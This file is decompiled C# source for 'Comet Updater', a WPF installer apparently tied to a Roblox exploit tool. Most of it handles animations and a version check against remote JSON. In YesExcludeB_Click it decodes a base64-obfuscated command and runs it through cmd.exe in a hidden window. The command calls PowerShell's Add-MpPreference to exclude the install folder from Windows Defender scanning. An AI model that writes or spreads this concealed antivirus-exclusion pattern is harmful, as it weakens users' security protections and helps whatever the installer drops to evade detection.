﻿using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Linq.Expressions;
using System.Net;
using System.Runtime.CompilerServices;
using System.Text;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Input;
using System.Windows.Markup;
using System.Windows.Media;
using System.Windows.Media.Animation;
using System.Windows.Shapes;
using System.Windows.Threading;
using Microsoft.CSharp.RuntimeBinder;
using Microsoft.Win32;
using Newtonsoft.Json;

namespace CometUpdate
{
	// Token: 0x02000003 RID: 3
	public partial class Update : Window
	{
		// Token: 0x06000005 RID: 5 RVA: 0x000020B4 File Offset: 0x000002B4
		public static bool WebViewIsInstalled()
		{
			if (Environment.Is64BitOperatingSystem)
			{
				using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\WOW6432Node\\Microsoft\\EdgeUpdate\\Clients\\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}"))
				{
					if (registryKey != null && registryKey.GetValue("pv") != null)
					{
						return true;
					}
					return false;
				}
			}
			bool result;
			using (RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EdgeUpdate\\Clients\\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}"))
			{
				if (registryKey2 != null && registryKey2.GetValue("pv") != null)
				{
					result = true;
				}
				else
				{
					result = false;
				}
			}
			return result;
		}

		// Token: 0x17000001 RID: 1
		// (get) Token: 0x06000006 RID: 6 RVA: 0x0000214C File Offset: 0x0000034C
		// (set) Token: 0x06000007 RID: 7 RVA: 0x00002154 File Offset: 0x00000354
		private IEasingFunction Smooth { get; set; } = new QuarticEase
		{
			EasingMode = EasingMode.EaseInOut
		};

		// Token: 0x06000008 RID: 8 RVA: 0x00002160 File Offset: 0x00000360
		public void Fade(DependencyObject Object)
		{
			DoubleAnimation doubleAnimation = new DoubleAnimation
			{
				From = new double?(0.0),
				To = new double?(1.0),
				Duration = new Duration(this.duration)
			};
			Storyboard.SetTarget(doubleAnimation, Object);
			Storyboard.SetTargetProperty(doubleAnimation, new PropertyPath("Opacity", new object[]
			{
				1
			}));
			this.StoryBoard.Children.Add(doubleAnimation);
			this.StoryBoard.Begin();
			this.StoryBoard.Children.Remove(doubleAnimation);
		}

		// Token: 0x06000009 RID: 9 RVA: 0x00002200 File Offset: 0x00000400
		public void FadeOut(DependencyObject Object)
		{
			DoubleAnimation doubleAnimation = new DoubleAnimation
			{
				From = new double?(1.0),
				To = new double?(0.0),
				Duration = new Duration(this.duration)
			};
			Storyboard.SetTarget(doubleAnimation, Object);
			Storyboard.SetTargetProperty(doubleAnimation, new PropertyPath("Opacity", new object[]
			{
				1
			}));
			this.StoryBoard.Children.Add(doubleAnimation);
			this.StoryBoard.Begin();
			this.StoryBoard.Children.Remove(doubleAnimation);
		}

		// Token: 0x0600000A RID: 10 RVA: 0x000022A0 File Offset: 0x000004A0
		public void ObjectShift(DependencyObject Object, Thickness Get, Thickness Set)
		{
			ThicknessAnimation thicknessAnimation = new ThicknessAnimation
			{
				From = new Thickness?(Get),
				To = new Thickness?(Set),
				Duration = this.duration2,
				EasingFunction = this.Smooth
			};
			Storyboard.SetTarget(thicknessAnimation, Object);
			Storyboard.SetTargetProperty(thicknessAnimation, new PropertyPath(FrameworkElement.MarginProperty));
			this.StoryBoard.Children.Add(thicknessAnimation);
			this.StoryBoard.Begin();
			this.StoryBoard.Children.Remove(thicknessAnimation);
		}

		// Token: 0x0600000B RID: 11 RVA: 0x00002330 File Offset: 0x00000530
		public void AddDistributor()
		{
			try
			{
				this.RegistrySettings.SetValue("websitelink", this.Distributor);
			}
			catch
			{
			}
		}

		// Token: 0x0600000C RID: 12 RVA: 0x00002368 File Offset: 0x00000568
		public Update()
		{
			this.InitializeComponent();
			string text = Update.HttpGet("https://cometrbx.xyz/external-files/EULA");
			this.LegalTextBox.Text = text;
			object arg = JsonConvert.DeserializeObject(this.webClient.DownloadString("https://cometrbx.xyz/external-files/CometJSONVer.json"));
			if (Update.<>o__18.<>p__5 == null)
			{
				Update.<>o__18.<>p__5 = CallSite<Func<CallSite, object, IEnumerable>>.Create(Binder.Convert(CSharpBinderFlags.None, typeof(IEnumerable), typeof(Update)));
			}
			foreach (object arg2 in Update.<>o__18.<>p__5.Target(Update.<>o__18.<>p__5, arg))
			{
				if (Update.<>o__18.<>p__4 == null)
				{
					Update.<>o__18.<>p__4 = CallSite<Func<CallSite, object, bool>>.Create(Binder.UnaryOperation(CSharpBinderFlags.None, ExpressionType.IsTrue, typeof(Update), new CSharpArgumentInfo[]
					{
						CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
					}));
				}
				Func<CallSite, object, bool> target = Update.<>o__18.<>p__4.Target;
				CallSite <>p__ = Update.<>o__18.<>p__4;
				if (Update.<>o__18.<>p__3 == null)
				{
					Update.<>o__18.<>p__3 = CallSite<Func<CallSite, object, object>>.Create(Binder.UnaryOperation(CSharpBinderFlags.None, ExpressionType.Not, typeof(Update), new CSharpArgumentInfo[]
					{
						CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
					}));
				}
				Func<CallSite, object, object> target2 = Update.<>o__18.<>p__3.Target;
				CallSite <>p__2 = Update.<>o__18.<>p__3;
				if (Update.<>o__18.<>p__2 == null)
				{
					Update.<>o__18.<>p__2 = CallSite<Func<CallSite, object, string, object>>.Create(Binder.InvokeMember(CSharpBinderFlags.None, "Contains", null, typeof(Update), new CSharpArgumentInfo[]
					{
						CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null),
						CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.UseCompileTimeType, null)
					}));
				}
				Func<CallSite, object, string, object> target3 = Update.<>o__18.<>p__2.Target;
				CallSite <>p__3 = Update.<>o__18.<>p__2;
				if (Update.<>o__18.<>p__1 == null)
				{
					Update.<>o__18.<>p__1 = CallSite<Func<CallSite, object, object>>.Create(Binder.InvokeMember(CSharpBinderFlags.None, "ToString", null, typeof(Update), new CSharpArgumentInfo[]
					{
						CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
					}));
				}
				Func<CallSite, object, object> target4 = Update.<>o__18.<>p__1.Target;
				CallSite <>p__4 = Update.<>o__18.<>p__1;
				if (Update.<>o__18.<>p__0 == null)
				{
					Update.<>o__18.<>p__0 = CallSite<Func<CallSite, object, object>>.Create(Binder.GetMember(CSharpBinderFlags.None, "InstallerVer", typeof(Update), new CSharpArgumentInfo[]
					{
						CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
					}));
				}
				if (target(<>p__, target2(<>p__2, target3(<>p__3, target4(<>p__4, Update.<>o__18.<>p__0.Target(Update.<>o__18.<>p__0, arg2)), this.BootstrapperVersion))))
				{
					if (MessageBox.Show("This installer is outdated! Please reinstall the installer to update.\nWould you like to open the website?", "Comet", MessageBoxButton.YesNo, MessageBoxImage.Hand) == MessageBoxResult.Yes)
					{
						try
						{
							Process.Start("https://" + this.Distributor);
						}
						catch
						{
							Clipboard.SetText("https://" + this.Distributor);
						}
					}
					Process.GetCurrentProcess().Kill();
				}
			}
			this.RGBTime = new DispatcherTimer(TimeSpan.FromMilliseconds(10.0), DispatcherPriority.Normal, delegate(object <p0>, EventArgs <p1>)
			{
				this.Rotate1.Angle += (double)this.RGBSpinSpeed;
				this.Rotate2.Angle += (double)this.RGBSpinSpeed;
				this.Rotate3.Angle += (double)this.RGBSpinSpeed;
				this.Rotate4.Angle += (double)this.RGBSpinSpeed;
			}, Application.Current.Dispatcher);
			this.RGBTime.Start();
			this.MainBorder.Opacity = 0.0;
			this.MainBorder.Margin = new Thickness(150.0, 215.0, 150.0, 215.0);
			this.RainbowGrid.Opacity = 1.0;
			this.RV1.Opacity = 1.0;
			this.RV2.Opacity = 0.0;
			this.RV3.Opacity = 0.0;
			this.RV4.Opacity = 0.0;
			this.Logo.Opacity = 0.0;
			this.C1.Margin = new Thickness(42.0, -42.0, -42.0, 42.0);
			this.C3.Margin = new Thickness(-42.0, 42.0, 42.0, -42.0);
			this.NotifyText.Content = "Welcome to Comet Updater!";
			this.MainSetup.Opacity = 0.0;
			this.EULAGrid.Opacity = 0.0;
			this.ExitGrid.Opacity = 0.0;
			this.EULAGrid.Margin = new Thickness(620.0, 0.0, -620.0, 0.0);
			this.ExcludeGrid.Margin = new Thickness(620.0, 0.0, -620.0, 0.0);
			this.ExitGrid.Margin = new Thickness(620.0, 0.0, -620.0, 0.0);
		}

		// Token: 0x0600000D RID: 13 RVA: 0x000028F4 File Offset: 0x00000AF4
		private void CometUpdate_Loaded(object sender, RoutedEventArgs e)
		{
			Update.<CometUpdate_Loaded>d__19 <CometUpdate_Loaded>d__;
			<CometUpdate_Loaded>d__.<>t__builder = AsyncVoidMethodBuilder.Create();
			<CometUpdate_Loaded>d__.<>4__this = this;
			<CometUpdate_Loaded>d__.<>1__state = -1;
			<CometUpdate_Loaded>d__.<>t__builder.Start<Update.<CometUpdate_Loaded>d__19>(ref <CometUpdate_Loaded>d__);
		}

		// Token: 0x0600000E RID: 14 RVA: 0x0000292C File Offset: 0x00000B2C
		private void ExitB_Click(object sender, RoutedEventArgs e)
		{
			Update.<ExitB_Click>d__20 <ExitB_Click>d__;
			<ExitB_Click>d__.<>t__builder = AsyncVoidMethodBuilder.Create();
			<ExitB_Click>d__.<>4__this = this;
			<ExitB_Click>d__.<>1__state = -1;
			<ExitB_Click>d__.<>t__builder.Start<Update.<ExitB_Click>d__20>(ref <ExitB_Click>d__);
		}

		// Token: 0x0600000F RID: 15 RVA: 0x00002963 File Offset: 0x00000B63
		private void MinimizeB_Click(object sender, RoutedEventArgs e)
		{
			base.WindowState = WindowState.Minimized;
		}

		// Token: 0x06000010 RID: 16 RVA: 0x0000296C File Offset: 0x00000B6C
		private void MainBorder_MouseLeftButtonDown(object sender, MouseButtonEventArgs e)
		{
			base.DragMove();
		}

		// Token: 0x06000011 RID: 17 RVA: 0x00002974 File Offset: 0x00000B74
		public static string HttpGet(string url)
		{
			string result;
			using (WebClient webClient = new WebClient())
			{
				webClient.Headers.Add(HttpRequestHeader.UserAgent, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)");
				result = webClient.DownloadString(url);
			}
			return result;
		}

		// Token: 0x06000012 RID: 18 RVA: 0x000029C0 File Offset: 0x00000BC0
		private void CometProcess()
		{
			Update.<CometProcess>d__24 <CometProcess>d__;
			<CometProcess>d__.<>t__builder = AsyncVoidMethodBuilder.Create();
			<CometProcess>d__.<>4__this = this;
			<CometProcess>d__.<>1__state = -1;
			<CometProcess>d__.<>t__builder.Start<Update.<CometProcess>d__24>(ref <CometProcess>d__);
		}

		// Token: 0x06000013 RID: 19 RVA: 0x000029F8 File Offset: 0x00000BF8
		private void CometProcess2()
		{
			Update.<CometProcess2>d__25 <CometProcess2>d__;
			<CometProcess2>d__.<>t__builder = AsyncVoidMethodBuilder.Create();
			<CometProcess2>d__.<>4__this = this;
			<CometProcess2>d__.<>1__state = -1;
			<CometProcess2>d__.<>t__builder.Start<Update.<CometProcess2>d__25>(ref <CometProcess2>d__);
		}

		// Token: 0x06000014 RID: 20 RVA: 0x00002A2F File Offset: 0x00000C2F
		private void YesB_Click(object sender, RoutedEventArgs e)
		{
			if (!Directory.Exists(Directory.GetCurrentDirectory() + "\\Comet"))
			{
				Directory.CreateDirectory(Directory.GetCurrentDirectory() + "\\Comet");
			}
			this.CometProcess();
		}

		// Token: 0x06000015 RID: 21 RVA: 0x00002A64 File Offset: 0x00000C64
		private void NoB_Click(object sender, RoutedEventArgs e)
		{
			Update.<NoB_Click>d__27 <NoB_Click>d__;
			<NoB_Click>d__.<>t__builder = AsyncVoidMethodBuilder.Create();
			<NoB_Click>d__.<>4__this = this;
			<NoB_Click>d__.<>1__state = -1;
			<NoB_Click>d__.<>t__builder.Start<Update.<NoB_Click>d__27>(ref <NoB_Click>d__);
		}

		// Token: 0x06000016 RID: 22 RVA: 0x00002A9C File Offset: 0x00000C9C
		private void YesExcludeB_Click(object sender, RoutedEventArgs e)
		{
			byte[] bytes = Convert.FromBase64String("L0MgcG93ZXJzaGVsbCAtaW5wdXRmb3JtYXQgbm9uZSAtb3V0cHV0Zm9ybWF0IG5vbmUgLU5vbkludGVyYWN0aXZlIC1Db21tYW5kIEFkZC1NcFByZWZlcmVuY2UgLUV4Y2x1c2lvblBhdGggIntwYXRofSI=");
			string @string = Encoding.UTF8.GetString(bytes);
			new Process
			{
				StartInfo = new ProcessStartInfo
				{
					WindowStyle = ProcessWindowStyle.Hidden,
					FileName = "cmd.exe",
					Arguments = @string.Replace("{path}", System.IO.Path.GetFullPath(".\\Comet"))
				}
			}.Start();
			this.CometProcess2();
		}

		// Token: 0x06000017 RID: 23 RVA: 0x00002B09 File Offset: 0x00000D09
		private void NoExcludeB_Click(object sender, RoutedEventArgs e)
		{
			this.CometProcess2();
		}

		// Token: 0x06000018 RID: 24 RVA: 0x00002B14 File Offset: 0x00000D14
		private void WelcomeB_Click(object sender, RoutedEventArgs e)
		{
			Update.<WelcomeB_Click>d__30 <WelcomeB_Click>d__;
			<WelcomeB_Click>d__.<>t__builder = AsyncVoidMethodBuilder.Create();
			<WelcomeB_Click>d__.<>4__this = this;
			<WelcomeB_Click>d__.<>1__state = -1;
			<WelcomeB_Click>d__.<>t__builder.Start<Update.<WelcomeB_Click>d__30>(ref <WelcomeB_Click>d__);
		}

		// Token: 0x04000002 RID: 2
		private string Distributor = "cometrbx.xyz";

		// Token: 0x04000003 RID: 3
		private string BootstrapperVersion = "1.8";

		// Token: 0x04000004 RID: 4
		private WebClient webClient = new WebClient();

		// Token: 0x04000005 RID: 5
		private RegistryKey RegistrySettings = Registry.CurrentUser.CreateSubKey("SOFTWARE\\CometSoftware_RBX");

		// Token: 0x04000006 RID: 6
		private DispatcherTimer RGBTime;

		// Token: 0x04000007 RID: 7
		private int RGBSpinSpeed = 15;

		// Token: 0x04000008 RID: 8
		private Storyboard StoryBoard = new Storyboard();

		// Token: 0x04000009 RID: 9
		private TimeSpan duration = TimeSpan.FromMilliseconds(500.0);

		// Token: 0x0400000A RID: 10
		private TimeSpan duration2 = TimeSpan.FromMilliseconds(1000.0);
	}
}
